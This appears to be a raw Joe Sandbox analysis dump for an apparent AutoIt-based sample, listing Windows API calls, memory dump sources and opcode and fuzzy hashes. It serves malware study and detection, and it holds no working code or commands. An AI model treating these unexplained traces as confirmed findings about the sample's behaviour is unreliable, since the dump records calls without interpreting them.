                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0071949C,?,00008000), ref: 00754052
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 8ab1a88af12cd141f86c614defc46890cd9d864d1cf6633103124f2bd4d6b7e3
                                                                • Instruction ID: 994af5014ba873a131a695176b8c2ad80d794f4ca3cd6b6d33f13572ba78568d
                                                                • Opcode Fuzzy Hash: 8ab1a88af12cd141f86c614defc46890cd9d864d1cf6633103124f2bd4d6b7e3
                                                                • Instruction Fuzzy Hash: B7012D31245225F6E3354A2ADC0EFE77F98AF427B5F148210BA9C5A1E08AB85894CB94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LoadString
                                                                • String ID:
                                                                • API String ID: 2948472770-0
                                                                • Opcode ID: c3ec61489e16f6f8848b82b2a03c199ab3d13f0d50b224002c3977b06fc4d931
                                                                • Instruction ID: bc4eb56eae64cdbcd9e986cc6a3eaeba0eb68a76cfcb106159fdbd67db0fed34
                                                                • Opcode Fuzzy Hash: c3ec61489e16f6f8848b82b2a03c199ab3d13f0d50b224002c3977b06fc4d931
                                                                • Instruction Fuzzy Hash: 9FD16C34A1424AEFCF18EF98D8859EDBBB5FF48310F144059E915AB291EB34AD81CF90
                                                                APIs
                                                                  • Part of subcall function 013200D8: GetFileAttributesW.KERNELBASE(?), ref: 013200E3
                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 013209D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AttributesCreateDirectoryFile
                                                                • String ID:
                                                                • API String ID: 3401506121-0
                                                                • Opcode ID: d7ef5e1e275b5b1acd1fbce6dc0c3c1079b6bc16d6b36970d56ed38ba3add44a
                                                                • Instruction ID: edc4e2904ca13d85826a66e3c4b07dbe27d593459180a9394383244163995f8a
                                                                • Opcode Fuzzy Hash: d7ef5e1e275b5b1acd1fbce6dc0c3c1079b6bc16d6b36970d56ed38ba3add44a
                                                                • Instruction Fuzzy Hash: 0161A331A1021997EF14EFA4C844BEF733AEF58700F004569F60DE7290EB359A49CBA5
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction ID: 512c81888d1c43e73297c7c26cd811637a5b892d6be384194f2a4f5a21751743
                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction Fuzzy Hash: 6E31E174A001199BD718DF69E4A0969FBB2FF49300B2486B5E80ACB756D735EDC1CBD0
                                                                APIs
                                                                  • Part of subcall function 00714E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E9C
                                                                  • Part of subcall function 00714E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00714EAE
                                                                  • Part of subcall function 00714E90: FreeLibrary.KERNEL32(00000000,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714EC0
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714EFD
                                                                  • Part of subcall function 00714E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E62
                                                                  • Part of subcall function 00714E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00714E74
                                                                  • Part of subcall function 00714E59: FreeLibrary.KERNEL32(00000000,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E87
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressFreeProc
                                                                • String ID:
                                                                • API String ID: 2632591731-0
                                                                • Opcode ID: 8fe67c9b368e29d9519de14325d62151ee7c813283ac5717759b8990d84b2c24
                                                                • Instruction ID: 76af7969f5a0577337adbcd0faad85bf62a73e91abf4df71a3cd64f4a0ee156a
                                                                • Opcode Fuzzy Hash: 8fe67c9b368e29d9519de14325d62151ee7c813283ac5717759b8990d84b2c24
                                                                • Instruction Fuzzy Hash: B011EB31600205EBDF15BB68DC0AFED77A59F80711F10441DF542A62D1DE799A85D750
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: __wsopen_s
                                                                • String ID:
                                                                • API String ID: 3347428461-0
                                                                • Opcode ID: 53b033ee531f3662b986c7b0c6d20b4bb0eb6f716091fe4cba2d80b76bd444c7
                                                                • Instruction ID: f30460c853e3dc0e3e3513be94dcb57c2beb8d9763100a9eb2d3614fc12aec4b
                                                                • Opcode Fuzzy Hash: 53b033ee531f3662b986c7b0c6d20b4bb0eb6f716091fe4cba2d80b76bd444c7
                                                                • Instruction Fuzzy Hash: 781118B590410EAFCB05DF58E94599E7BF5EF48314F144059FC08AB312DB35EA11CBA5
                                                                APIs
                                                                  • Part of subcall function 00744C7D: RtlAllocateHeap.NTDLL(00000008,00711129,00000000,?,00742E29,00000001,00000364,?,?,?,0073F2DE,00743863,007E1444,?,0072FDF5,?), ref: 00744CBE
                                                                • _free.LIBCMT ref: 0074506C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                • Instruction ID: 51c1f12f1c16426740089c69f655a24486b61a07381b58eee4094772cea8e08e
                                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                • Instruction Fuzzy Hash: 16014976204705ABE3318F69D885A9AFBEDFB89370F65061DF184932C1EB34A805C7B4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                • Instruction ID: 1a243268a1c68ddd28128b956a7ceb449ee541cce34ddaf88e3c17b924417484
                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                • Instruction Fuzzy Hash: 88F0CD32511A14D7F7313A659C0EB5B37989F52375F100719F525931D3DB7CE80285A6
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID:
                                                                • API String ID: 176396367-0
                                                                • Opcode ID: 5f7a7664f17da1d19d8954cca8c3b176727d96928ac8342286fd15acdcdd70ab
                                                                • Instruction ID: c57f26364773126c33c120c63d90cacebcfa8d28518bb6656429fd8a0b5b22ca
                                                                • Opcode Fuzzy Hash: 5f7a7664f17da1d19d8954cca8c3b176727d96928ac8342286fd15acdcdd70ab
                                                                • Instruction Fuzzy Hash: 7BF0C8B3600614BED7159F38D806BA7BBA8EB44760F10853EF619CB1D1DB35E55087E0
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,00711129,00000000,?,00742E29,00000001,00000364,?,?,?,0073F2DE,00743863,007E1444,?,0072FDF5,?), ref: 00744CBE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 684cb63b132dec826163496a89eaec8a492cc08efb4f3744cfb6f428d438e346
                                                                • Instruction ID: de84e5fc178d8d214b39c303ce0938d6651e45a40d35da0365c5fbbbb4210b49
                                                                • Opcode Fuzzy Hash: 684cb63b132dec826163496a89eaec8a492cc08efb4f3744cfb6f428d438e346
                                                                • Instruction Fuzzy Hash: 21F0E932603224A7EB315F62AC89B5B3788BF417A1F1C8111FC15AA181CB3CDC0066F0
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 0d0a7271a6bd409d3eac5dad85aee32aa6fffc57d141abbbb920bd9ed82cfbe6
                                                                • Instruction ID: baf43af9b646a94707b2f5615ce9bdf9c07b6fd36ae64d4b311f996c418f76aa
                                                                • Opcode Fuzzy Hash: 0d0a7271a6bd409d3eac5dad85aee32aa6fffc57d141abbbb920bd9ed82cfbe6
                                                                • Instruction Fuzzy Hash: 5EE0E532141224AAF62126679C05B9BB74DAB827B0F0A0022BC1C96481DB2DED0185F0
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714F6D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: c11b6d10422cd28595214c7678423047eb02288be0cf4819301b5c5079df35d7
                                                                • Instruction ID: b39c22409534f28a96a4f2beedde8827906a01dfd44a995f61bfe2f7a18688fe
                                                                • Opcode Fuzzy Hash: c11b6d10422cd28595214c7678423047eb02288be0cf4819301b5c5079df35d7
                                                                • Instruction Fuzzy Hash: 2FF0A070105301CFDB348F28D490892B7F8EF00319318897EE1DA86651C7399885DF00
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0075EE51,007D3630,00000002), ref: 0077CD26
                                                                  • Part of subcall function 0077CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0077CD19,?,?,?), ref: 0077CC59
                                                                  • Part of subcall function 0077CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0077CD19,?,?,?,?,0075EE51,007D3630,00000002), ref: 0077CC6E
                                                                  • Part of subcall function 0077CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0077CD19,?,?,?,?,0075EE51,007D3630,00000002), ref: 0077CC7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$Write
                                                                • String ID:
                                                                • API String ID: 3847668363-0
                                                                • Opcode ID: d21a97bb827a8a13a9784c924f50dfe3753a2b58d35a9d0507d2763355123dae
                                                                • Instruction ID: 67929de09662b06d2b8d39b1f76ee43bef4362bfce560ae2f00765984cd6789e
                                                                • Opcode Fuzzy Hash: d21a97bb827a8a13a9784c924f50dfe3753a2b58d35a9d0507d2763355123dae
                                                                • Instruction Fuzzy Hash: F3E03076500604EFCB229F56D9018AABBF9FF85250710852FE95582110D775AA14DB60
                                                                APIs
                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00712DC4
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LongNamePath_wcslen
                                                                • String ID:
                                                                • API String ID: 541455249-0
                                                                • Opcode ID: 6faf21b02cf0af1eddda0951b7f0fd8b36994c43d369bbe4e98e88740bdc7243
                                                                • Instruction ID: ef46e7dde26e139298ecb2fe795f6294e96c75ef564f41c83da2b11f1bb84556
                                                                • Opcode Fuzzy Hash: 6faf21b02cf0af1eddda0951b7f0fd8b36994c43d369bbe4e98e88740bdc7243
                                                                • Instruction Fuzzy Hash: D6E0CD726041245BC72192589C09FEA77EDDFC8791F054071FD09D7288D964AD848550
                                                                APIs
                                                                  • Part of subcall function 00713837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713908
                                                                  • Part of subcall function 0071D730: GetInputState.USER32 ref: 0071D807
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00712B6B
                                                                  • Part of subcall function 007130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0071314E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                • String ID:
                                                                • API String ID: 3667716007-0
                                                                • Opcode ID: 7a2a03c07a2bb5481ad348de0da96e2d858a5f1acc2b2fc6a66a4c7a04467afa
                                                                • Instruction ID: 409194b16441804dff6b74a42844c6ffe8a26902afca06ce8ac2de5d6dce600e
                                                                • Opcode Fuzzy Hash: 7a2a03c07a2bb5481ad348de0da96e2d858a5f1acc2b2fc6a66a4c7a04467afa
                                                                • Instruction Fuzzy Hash: 7AE0263230428483CB04BB7CA85B4EDA3998BD6351F40043EF142472E3CE2C89C64352
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?), ref: 013200E3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                • Instruction ID: 65d1f280346b11fcef286dfb85ab46242e2fb3d57639afd5d3ece0c1c618c4da
                                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                • Instruction Fuzzy Hash: 4EE0C2B090521CEBDB18EBBDCE49AAD77A9EB05324F204654FD46C32C0D934AA08D750
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?), ref: 013200B3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                • Instruction ID: 43f78c15560815d59576d21afaa985ab04fee47e5bd7ecca53c5b4819550b578
                                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                • Instruction Fuzzy Hash: AAD0A73090620CEBDB10DFB89D049DD73ACD705324F008754FD15C3280D53699089758
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00750704,?,?,00000000,?,00750704,00000000,0000000C), ref: 007503B7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 355314f27c768120cf49cee82f4b5c06d1c41d98c15c983ea39391b747edfdcd
                                                                • Instruction ID: 4dae7c9d816b162cea2ea98dab8e5618de76efff89b4ddcf5f45c17c5ab07e1e
                                                                • Opcode Fuzzy Hash: 355314f27c768120cf49cee82f4b5c06d1c41d98c15c983ea39391b747edfdcd
                                                                • Instruction Fuzzy Hash: 32D06C3214010DBBDF028F84DD06EDA3BAAFB88714F018000BE1856020C736E821AB94
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00711CBC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: InfoParametersSystem
                                                                • String ID:
                                                                • API String ID: 3098949447-0
                                                                • Opcode ID: 93ace0ad0194841b87b462004dad1eb3a08eef01334c53c28c6b65d760432aa2
                                                                • Instruction ID: 7b27006ae3dbb585dc09542d98860080c415c026221e8c6ba1212d1f650abdde
                                                                • Opcode Fuzzy Hash: 93ace0ad0194841b87b462004dad1eb3a08eef01334c53c28c6b65d760432aa2
                                                                • Instruction Fuzzy Hash: E8C09B36281344AFF2154784BD9BF107758A34CB00F54C001F6095D5E3C7B51830D658
                                                                APIs
                                                                  • Part of subcall function 00715745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0071949C,?,00008000), ref: 00715773
                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 007876DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
